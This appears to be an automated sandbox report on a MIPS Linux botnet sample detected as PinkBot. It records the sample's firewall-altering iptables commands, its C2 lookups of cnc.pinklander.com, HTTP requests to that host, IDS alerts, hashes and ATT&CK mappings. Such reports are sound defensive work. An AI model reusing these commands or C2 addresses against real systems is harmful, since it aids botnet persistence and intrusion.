Source: /bin/sh (PID: 5654)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5667)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L OUTPUTJump to behavior
Source: /bin/sh (PID: 5622)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior
Source: /bin/sh (PID: 5625)Iptables executable: /sbin/iptables -> /sbin/iptables -I INPUT -p udp --dport 123 -j ACCEPTJump to behavior
Source: /bin/sh (PID: 5675)Iptables executable: /sbin/iptables -> /sbin/iptables -n -L INPUTJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 53726 -> 1088
Source: /tmp/file.elf (PID: 5527)Sleeps longer then 60s: 300.0sJump to behavior
Source: /tmp/file.elf (PID: 5523)Queries kernel information via 'uname': Jump to behavior
Source: file.elf, 5523.1.000055fe755fc000.000055fe75683000.rw-.sdmp, file.elf, 5618.1.000055fe755fc000.000055fe75683000.rw-.sdmp, file.elf, 5671.1.000055fe755fc000.000055fe75683000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: file.elf, 5523.1.000055fe755fc000.000055fe75683000.rw-.sdmp, file.elf, 5618.1.000055fe755fc000.000055fe75683000.rw-.sdmp, file.elf, 5671.1.000055fe755fc000.000055fe75683000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
Source: file.elf, 5523.1.00007fffa3321000.00007fffa3342000.rw-.sdmp, file.elf, 5618.1.00007fffa3321000.00007fffa3342000.rw-.sdmp, file.elf, 5671.1.00007fffa3321000.00007fffa3342000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
Source: file.elf, 5523.1.00007fffa3321000.00007fffa3342000.rw-.sdmp, file.elf, 5618.1.00007fffa3321000.00007fffa3342000.rw-.sdmp, file.elf, 5671.1.00007fffa3321000.00007fffa3342000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/file.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/file.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path Interception1
Virtualization/Sandbox Evasion
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System11
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account Manager1
System Network Configuration Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587491 Sample: file.elf Startdate: 10/01/2025 Architecture: LINUX Score: 72 65 cnc.pinklander.com 13.251.16.150, 1088, 50788, 53726 AMAZON-02US United States 2->65 69 Suricata IDS alerts for network traffic 2->69 71 Antivirus / Scanner detection for submitted sample 2->71 73 Multi AV Scanner detection for submitted file 2->73 75 Uses known network protocols on non-standard ports 2->75 11 file.elf 2->11         started        signatures3 process4 process5 13 file.elf 11->13         started        process6 15 file.elf 13->15         started        17 file.elf 13->17         started        19 file.elf sh 13->19         started        21 3 other processes 13->21 process7 23 file.elf sh 15->23         started        25 file.elf sh 15->25         started        27 file.elf sh 15->27         started        38 6 other processes 15->38 29 file.elf 17->29         started        31 file.elf 17->31         started        33 sh iptables 19->33         started        36 sh iptables 21->36         started        signatures8 40 sh iptables 23->40         started        42 sh iptables 25->42         started        44 sh iptables 27->44         started        46 file.elf sh 29->46         started        48 file.elf sh 29->48         started        50 file.elf sh 31->50         started        67 Executes the "iptables" command to insert, remove and/or manipulate rules 33->67 52 sh iptables 38->52         started        54 sh iptables 38->54         started        56 3 other processes 38->56 process9 process10 58 sh iptables 46->58         started        61 sh iptables 48->61         started        63 sh iptables 50->63         started        signatures11 77 Executes the "iptables" command to insert, remove and/or manipulate rules 58->77

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.elf57%VirustotalBrowse
file.elf61%ReversingLabsLinux.Trojan.Pink
file.elf100%AviraLINUX/Agent.rguwm
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://150.16.251.13/0%Avira URL Cloudsafe
http://%s:%d/d/index.htmlcnc.pinklander.com/tmp/pink/cache_finder_page_webhttp://%s//tmp/pink/fc_ip%0%Avira URL Cloudsafe
http://%s:%d/d/index.html0%Avira URL Cloudsafe
http://150.16.251.13:1088/d/index.html0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
cnc.pinklander.com
13.251.16.150
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    http://150.16.251.13/false
    • Avira URL Cloud: safe
    unknown
    http://150.16.251.13:1088/d/index.htmlfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://%s:%d/d/index.htmlcnc.pinklander.com/tmp/pink/cache_finder_page_webhttp://%s//tmp/pink/fc_ip%file.elffalse
    • Avira URL Cloud: safe
    unknown
    http://%s:%d/d/index.htmlfile.elffalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    13.251.16.150
    cnc.pinklander.comUnited States
    16509AMAZON-02USfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    13.251.16.150PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
    • qaynky.biz/rss
    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/mmbextsivoeuyvtt
    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/sdnqcxpiurneql
    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/pn
    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
    • ifsaia.biz/vcyisuboorqd
    Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
    • ifsaia.biz/laps
    invoice_96.73.exeGet hashmaliciousFormBookBrowse
    • iuzpxe.biz/tgcwttfqletfhyq
    Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
    • gcedd.biz/xindlfknrhvc
    C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
    • gcedd.biz/rw
    PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
    • ifsaia.biz/jlhpxxcq
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AMAZON-02USfile.elfGet hashmaliciousUnknownBrowse
    • 54.171.230.55
    file.elfGet hashmaliciousUnknownBrowse
    • 54.217.10.153
    https://app.planable.io/review/0OPaw36t6M_kGet hashmaliciousHTMLPhisherBrowse
    • 52.17.171.17
    https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
    • 18.245.46.98
    Undelivered Messages.htmGet hashmaliciousUnknownBrowse
    • 18.245.31.5
    arm7.elfGet hashmaliciousUnknownBrowse
    • 54.171.230.55
    Client.exeGet hashmaliciousAsyncRATBrowse
    • 35.154.189.194
    1162-201.exeGet hashmaliciousFormBookBrowse
    • 76.223.67.189
    https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
    • 52.211.89.170
    3.elfGet hashmaliciousUnknownBrowse
    • 18.151.37.43
    No context
    No context
    Process:/tmp/file.elf
    File Type:gzip compressed data, from Unix, truncated
    Category:dropped
    Size (bytes):20
    Entropy (8bit):1.2917601481809733
    Encrypted:false
    SSDEEP:3:Ftt:Xt
    MD5:7029066C27AC6F5EF18D660D5741979A
    SHA1:46C6643F07AA7F6BFE7118DE926B86DEFC5087C4
    SHA-256:59869DB34853933B239F1E2219CF7D431DA006AA919635478511FABBFC8849D2
    SHA-512:7E8E93F4A89CE7FAE011403E14A1D53544C6E6F6B6010D61129DC27937806D2B03802610D7999EAB33A4C36B0F9E001D9D76001B8354087634C1AA9C740C536F
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:....................
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):10
    Entropy (8bit):2.721928094887362
    Encrypted:false
    SSDEEP:3:LaVTh:2
    MD5:EA6799EC47FAAF547D6A916B059D8BCA
    SHA1:620C2CC980548257069A173FAE2304752107E882
    SHA-256:17B1B5B2A80B151847A10950DA0203FBEB15D10FB5751D62FC443C16F6C6DD1C
    SHA-512:FF659CAA0EFFFD9371C673F34FE3C52B5CF62A62F0E5228CFBD72A17E5C50B5C985D9C06CADBB8F8973D45842E42EA644B1C261AB6034516EAD2403FC709CA48
    Malicious:false
    Reputation:low
    Preview:1736510695
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):10
    Entropy (8bit):2.721928094887362
    Encrypted:false
    SSDEEP:3:LaVTh:2
    MD5:EA6799EC47FAAF547D6A916B059D8BCA
    SHA1:620C2CC980548257069A173FAE2304752107E882
    SHA-256:17B1B5B2A80B151847A10950DA0203FBEB15D10FB5751D62FC443C16F6C6DD1C
    SHA-512:FF659CAA0EFFFD9371C673F34FE3C52B5CF62A62F0E5228CFBD72A17E5C50B5C985D9C06CADBB8F8973D45842E42EA644B1C261AB6034516EAD2403FC709CA48
    Malicious:false
    Reputation:low
    Preview:1736510695
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):64
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:pjB:n
    MD5:10311431E6EFA482F2E69D5B9D192941
    SHA1:1CD04617938FD693AFA091FFD9BD71D793D595AD
    SHA-256:9EF249AEBF53BC11E0179D8296301AAB1AE68362E68DFDE28042CCA233EE31EA
    SHA-512:320E63AB594BB32FD83FF28F8C8C92D82B647006DC0AA87F1D8A892C158D126CDBD0F643FD333EAA7FDF0E1B5D4203B8A16F5322CC2A43A704379C130FFD209A
    Malicious:false
    Reputation:low
    Preview:-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1-1
    Process:/tmp/file.elf
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):4
    Entropy (8bit):1.0
    Encrypted:false
    SSDEEP:3:pp:j
    MD5:B74BE257D5C98576EB7D74FBE53DECE1
    SHA1:3503F3850BB04BF5FAF736BD1642066EC6D5A558
    SHA-256:774E9B190BEEA2232D5A5F7D17C17961284CD3AF11E76D25A28AF755F002E8C4
    SHA-512:699AED21719FA161B2AE2741A0A538BA1E16D11BC7C7FCC5EFECF46C68A766F10979B1287881087A7B0FA7E3225FBAA72895129367F84050B41FB040175398C7
    Malicious:false
    Reputation:low
    Preview:-1-1
    Process:/sbin/iptables
    File Type:ASCII text
    Category:dropped
    Size (bytes):164
    Entropy (8bit):3.77769731203799
    Encrypted:false
    SSDEEP:3:ULUsTt1xMJ+DRF09hZxRXWmms8IWhSN5eNKVKGv:ULUsmJ+DRKhhXWXgS4KGv
    MD5:A96BDE933539F9145925F60C195DC33A
    SHA1:C869E5E6E617623819436CE06D1074C90F2981F9
    SHA-256:9211E22FDC170B0E2B70FB4954E52A74C0D73B3DF4CAF9EB806B25A879F24F7E
    SHA-512:034822D25CAD5D0C6F9B930AA72549DA6FD1C770BF13F721563E3F3018E2F33579E6E5B112672C3259470A9CF5FA375AC8D87876AB7B77AEC15F1124677EF654
    Malicious:false
    Reputation:low
    Preview:Chain INPUT (policy ACCEPT).target prot opt source destination .ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:123.
    Process:/sbin/iptables
    File Type:ASCII text
    Category:dropped
    Size (bytes):91
    Entropy (8bit):3.745406018260019
    Encrypted:false
    SSDEEP:3:ULlA3Vzt1xMJ+DRF09hZxRXt:ULlI4J+DRKhhXt
    MD5:5C6B03281E68751E6D3A4555637090E4
    SHA1:FCA886FF5D09EA5CACB19B0E72773F407539DEC4
    SHA-256:88A1A8CB11B5CFFE4CACF01CC5D2154DF6CC26DA8E2362F3A187B56AE7537F10
    SHA-512:AF027E266925B884149B73710669E29295EAA01496628086EDFF4E77C6980E87890EC9905C75C5517EA5D07C7CA2A5A6E6B32CF8FE336436112DDC7D120F1946
    Malicious:false
    Reputation:low
    Preview:Chain OUTPUT (policy ACCEPT).target prot opt source destination .
    Process:/tmp/file.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:Tg4n:Tg4
    MD5:256E722E092BB0C35A003C120A06CD0D
    SHA1:F0282586CBD36C0015025C0200A4208BB6AD130C
    SHA-256:E8B8C21D838E7B51627767942CC6FDF182E5E409C634A7C85002D1109161B649
    SHA-512:4F52DCF7944A06CE22BF363BD40E32DD842EEC3FEDEBAC50DAF1A2705B095BEBD0AB4E8313EEAE238B82E5BF23D5C95D722A4D36F578E6551C502E305CE6603C
    Malicious:false
    Reputation:low
    Preview:/tmp/file.elf.
    Process:/tmp/file.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:Tg4n:Tg4
    MD5:256E722E092BB0C35A003C120A06CD0D
    SHA1:F0282586CBD36C0015025C0200A4208BB6AD130C
    SHA-256:E8B8C21D838E7B51627767942CC6FDF182E5E409C634A7C85002D1109161B649
    SHA-512:4F52DCF7944A06CE22BF363BD40E32DD842EEC3FEDEBAC50DAF1A2705B095BEBD0AB4E8313EEAE238B82E5BF23D5C95D722A4D36F578E6551C502E305CE6603C
    Malicious:false
    Preview:/tmp/file.elf.
    Process:/tmp/file.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.2359263506290334
    Encrypted:false
    SSDEEP:3:Tg4n:Tg4
    MD5:256E722E092BB0C35A003C120A06CD0D
    SHA1:F0282586CBD36C0015025C0200A4208BB6AD130C
    SHA-256:E8B8C21D838E7B51627767942CC6FDF182E5E409C634A7C85002D1109161B649
    SHA-512:4F52DCF7944A06CE22BF363BD40E32DD842EEC3FEDEBAC50DAF1A2705B095BEBD0AB4E8313EEAE238B82E5BF23D5C95D722A4D36F578E6551C502E305CE6603C
    Malicious:false
    Preview:/tmp/file.elf.
    File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
    Entropy (8bit):5.30495574987329
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:file.elf
    File size:610'960 bytes
    MD5:3a620ff356686b461e0e1a12535bea24
    SHA1:a1f6ddfdd78885eb585704131b6dac1d0abae4ea
    SHA256:a430ed516a8a596570bc3a496b99cf6c7dd0a69ae0614ab2d2de6e9a8a6c2fc8
    SHA512:c7a610bf76225bd01cbc99857c87aa63f5dd316625f400ccc9562f4ad77f55ebfcf4116731f82ba55d1d195c81ddde5701e7faf86f832da8e0ae01438f2f0b0d
    SSDEEP:6144:Px603RYIUg4fisEb+bua9vRdM+RRVdp/kzEd/EudQMxsuOfzmJ/0j+etz5bHZ:Px6DTOs79TRdAEhEU5NYzKI+etZZ
    TLSH:B3D462EDABA12EBFD81EDE3200650682144C429A13D66B7FA5B6C518F78FD0F49D3C58
    File Content Preview:.ELF....................p.@.4...........4. ...(........p......@...@...........................@...@.P,..P,...............0...0J..0J.."..d...............\0..\0J.\0J.................Q.td..................................................J....<...'!......'...

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:MIPS R3000
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x400170
    Flags:0x1007
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:5
    Section Header Offset:0
    Section Header Size:40
    Number of Section Headers:0
    Header String Table Index:0
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    <unknown>0xd40x4000d40x4000d40x180x181.45750x4R 0x4
    LOAD0x00x4000000x4000000x92c500x92c505.30670x5R E0x10000
    LOAD0x930000x4a30000x4a30000x22900x128d644.72220x6RW 0x10000
    TLS0x9305c0x4a305c0x4a305c0x00x80.00000x4R 0x4
    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
    2025-01-10T13:04:51.926756+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.15384128.8.8.853UDP
    2025-01-10T13:04:52.929204+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.15397448.8.8.853UDP
    2025-01-10T13:04:55.274675+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.15374148.8.8.853UDP
    2025-01-10T13:04:56.277243+01002034317ET MALWARE PinkBot CnC Domain in DNS Lookup (cnc .pinklander .com)1192.168.2.15450628.8.8.853UDP
    2025-01-10T13:04:59.509942+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.1550788TCP
    2025-01-10T13:04:59.509942+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.1550788TCP
    TimestampSource PortDest PortSource IPDest IP
    Jan 10, 2025 13:04:53.933773994 CET537261088192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:53.938723087 CET10885372613.251.16.150192.168.2.15
    Jan 10, 2025 13:04:53.938796043 CET537261088192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:54.044399023 CET537261088192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:54.049278975 CET10885372613.251.16.150192.168.2.15
    Jan 10, 2025 13:04:55.233983994 CET10885372613.251.16.150192.168.2.15
    Jan 10, 2025 13:04:55.234042883 CET10885372613.251.16.150192.168.2.15
    Jan 10, 2025 13:04:55.234095097 CET537261088192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:55.270572901 CET537261088192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:55.275495052 CET10885372613.251.16.150192.168.2.15
    Jan 10, 2025 13:04:57.281049967 CET5078880192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:57.285963058 CET805078813.251.16.150192.168.2.15
    Jan 10, 2025 13:04:57.286036968 CET5078880192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:57.400341988 CET5078880192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:57.405273914 CET805078813.251.16.150192.168.2.15
    Jan 10, 2025 13:04:58.662766933 CET805078813.251.16.150192.168.2.15
    Jan 10, 2025 13:04:58.662827969 CET805078813.251.16.150192.168.2.15
    Jan 10, 2025 13:04:58.662864923 CET5078880192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:58.705275059 CET5078880192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:59.504882097 CET5078880192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:59.504924059 CET5078880192.168.2.1513.251.16.150
    Jan 10, 2025 13:04:59.509942055 CET805078813.251.16.150192.168.2.15
    Jan 10, 2025 13:04:59.510029078 CET5078880192.168.2.1513.251.16.150
    TimestampSource PortDest PortSource IPDest IP
    Jan 10, 2025 13:04:51.926755905 CET3841253192.168.2.158.8.8.8
    Jan 10, 2025 13:04:52.024991989 CET53384128.8.8.8192.168.2.15
    Jan 10, 2025 13:04:52.929203987 CET3974453192.168.2.158.8.8.8
    Jan 10, 2025 13:04:53.065288067 CET53397448.8.8.8192.168.2.15
    Jan 10, 2025 13:04:55.274674892 CET3741453192.168.2.158.8.8.8
    Jan 10, 2025 13:04:55.281688929 CET53374148.8.8.8192.168.2.15
    Jan 10, 2025 13:04:56.277242899 CET4506253192.168.2.158.8.8.8
    Jan 10, 2025 13:04:56.284754992 CET53450628.8.8.8192.168.2.15
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Jan 10, 2025 13:04:51.926755905 CET192.168.2.158.8.8.80xf2b0Standard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:52.929203987 CET192.168.2.158.8.8.80x4156Standard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:55.274674892 CET192.168.2.158.8.8.80xa5fcStandard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:56.277242899 CET192.168.2.158.8.8.80xa6aeStandard query (0)cnc.pinklander.comA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Jan 10, 2025 13:04:52.024991989 CET8.8.8.8192.168.2.150xf2b0No error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:53.065288067 CET8.8.8.8192.168.2.150x4156No error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:55.281688929 CET8.8.8.8192.168.2.150xa5fcNo error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    Jan 10, 2025 13:04:56.284754992 CET8.8.8.8192.168.2.150xa6aeNo error (0)cnc.pinklander.com13.251.16.150A (IP address)IN (0x0001)false
    • 150.16.251.13:1088
    • 150.16.251.13
    Session IDSource IPSource PortDestination IPDestination Port
    0192.168.2.155372613.251.16.1501088
    TimestampBytes transferredDirectionData
    Jan 10, 2025 13:04:54.044399023 CET290OUTGET /d/index.html HTTP/1.1
    Host: 150.16.251.13:1088
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: zh-cn,zh;q=0.7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
    Accept-Encoding: gzip


    Session IDSource IPSource PortDestination IPDestination Port
    1192.168.2.155078813.251.16.15080
    TimestampBytes transferredDirectionData
    Jan 10, 2025 13:04:57.400341988 CET286OUTGET / HTTP/1.1
    Host: 150.16.251.13
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: zh-cn,zh;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
    Accept-Encoding: gzip
    Jan 10, 2025 13:04:58.662766933 CET474INHTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 12:04:58 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=e25ec1b5248373bbd2cfd99ac24c4204|8.46.123.189|1736510698|1736510698|0|1|0; path=/; domain=150.16.251.13; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Content-Encoding: gzip
    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 140


    System Behavior

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:/tmp/file.elf
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:51
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -t mangle -D PREROUTING -p tcp --dport 80 -j QUEUE
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -t mangle -D POSTROUTING -p tcp --sport 80 -j QUEUE
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:04:55
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:11
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:11
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:11
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:-
    File size:129816 bytes
    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

    Start time (UTC):12:05:11
    Start date (UTC):10/01/2025
    Path:/sbin/iptables
    Arguments:/sbin/iptables -n -L OUTPUT
    File size:99296 bytes
    MD5 hash:1ab05fef765b6342cdfadaa5275b33af

    Start time (UTC):12:05:27
    Start date (UTC):10/01/2025
    Path:/tmp/file.elf
    Arguments:-
    File size:5773336 bytes
    MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9

    Start time (UTC):12:05:27
    Start date (UTC):10/01/2025
    Path:/bin/sh
    Arguments:/bin/sh -c "/sbin/iptables -n -L OUTPUT > /tmp/pink/protect_ipt_check"
    File size:129816 bytes
